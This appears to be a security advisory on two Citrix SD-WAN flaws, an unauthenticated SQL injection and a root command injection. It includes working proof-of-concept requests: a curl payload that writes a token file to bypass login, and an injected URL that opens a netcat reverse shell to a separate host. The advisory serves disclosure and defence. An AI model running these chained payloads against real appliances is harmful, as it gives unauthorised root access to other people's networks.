Multiple vulnerabilities were discovered in the Citrix SD-WAN appliance. By exploiting the vulnerabilities in combination, a remote, unauthenticated attacker can gain root access.
CVE-2019-12989: Unauthenticated SQL Injection /sdwan/nitro/v1/config/get_package_file
The cgi-bin/sdwanrestapi/getpackagefile.cgi Perl script contains a SQL injection vulnerability that can be exploited by a remote,
unauthenticated attacker. Input validation is not applied before incorporating user input in a SQL query. By exploiting this
vulnerability with a crafted HTTP request, an attacker is able to write to (and create) files in locations writable by the 'mysql'
user. For instance, a file can be created in the /tmp directory. A SQL injection payload can be constructed in such a way that the attacker is
able to completely bypass the authentication mechanism by writing a token file to the /tmp directory.
The SQL injection vulnerability can be triggered by crafting the HTTP POST request such that:
- An HTTP header 'SSL_CLIENT_VERIFY' is set with the value 'SUCCESS'
- '?action=file_download'
- Content-type is 'application/json'
- Post data is a JSON containing the SQL injection payload in the 'site_name'
Below is vulnerable code. However, there are other vulnerable queries:
175 if($package_type eq "active"){
176 $query = "SELECT observed_sw_revision, appliance_name, expected_sw_revision, package_file_name from Network_Appliance_Active " .
177 "WHERE site_name ='" . $site_name_arg . "' AND " .
178 "appliance_id=" . $appliance_id_arg.";";
179 }
Proof of Concept
In the curl command below, a token file will be created at /tmp/token_01234.
curl --insecure -H 'SSL_CLIENT_VERIFY: SUCCESS' -H 'Content-Type: application/json' -d '{"get_package_file": {"site_name": "blah'"' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_01234';#\""',"appliance_type": "primary","package_type": "active"}}' https://192.168.1.212/sdwan/nitro/v1/config/get_package_file?action=file_download
Next visit this address in a web browser. You should be logged in.:
https://192.168.1.212/cgi-bin/vwdash.cgi?swc-token=01234
CVE-2019-12991: Authenticated Command Injection /cgi-bin/installpatch.cgi
Installpatch.cgi suffers from a command injection vulnerability. This vulnerability can be exploited by a remote, authenticated
attacker to execute OS commands with root privileges. Specifically, the 'installfile' parameter value is not validated prior to
using it in a call to the Perl system() function.
Proof of Concept
After having bypassed auth, visit this URL.
https://192.168.1.212/cgi-bin/installpatch.cgi?swc-token=01234&installfile=`sudo%20nc%20-nv%20192.168.1.191%204444%20-e%20/bin/bash`